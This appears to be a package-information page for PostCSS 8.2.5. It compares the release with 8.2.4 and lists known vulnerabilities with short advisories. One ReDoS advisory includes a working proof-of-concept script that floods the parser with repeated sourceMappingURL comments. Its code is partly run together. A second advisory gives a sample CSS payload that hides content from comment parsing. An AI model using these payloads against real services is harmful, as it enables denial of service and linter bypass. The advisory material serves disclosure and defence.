PostCSS 8.2.5 represents a minor update to the popular PostCSS tool, designed for transforming CSS with JavaScript plugins. Comparing it to the previous stable version, 8.2.4, there are a few subtle but potentially relevant differences for developers. Both releases share core characteristics: they maintain consistent dependencies on nanoid, colorette, and source-map, ensuring continued compatibility with these utility libraries. They also uphold the MIT license, signifying permissive usage, and are developed by Andrey Sitnik. Both versions are distributed via npm, are hosted on GitHub, and support the PostCSS Open Collective.
The most noticeable change is a slight increase in the unpacked size of the package, from 203350 bytes in version 8.2.4 to 203659 bytes in version 8.2.5. While small, this could indicate minor code additions, optimizations, or modifications in the updated release. Another key update is the release date. Version 8.2.5 was released on February 6, 2021, signifying the incorporation of any bug fixes, performance tweaks, or feature enhancements implemented since the January 9, 2021 release of version 8.2.4. Developers should evaluate the changelog, if available, to identify all specific modifications of version 8.2.5, and determine if they are impactful to their usage. The slight increase in package size for version 8.2.5, combined with the newer release date, suggests incremental improvements, making it a potentially worthwhile upgrade for users seeking the most up-to-date and refined version of PostCSS within the 8.2.x series.
All the vulnerabilities related to the version 8.2.5 of the package
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.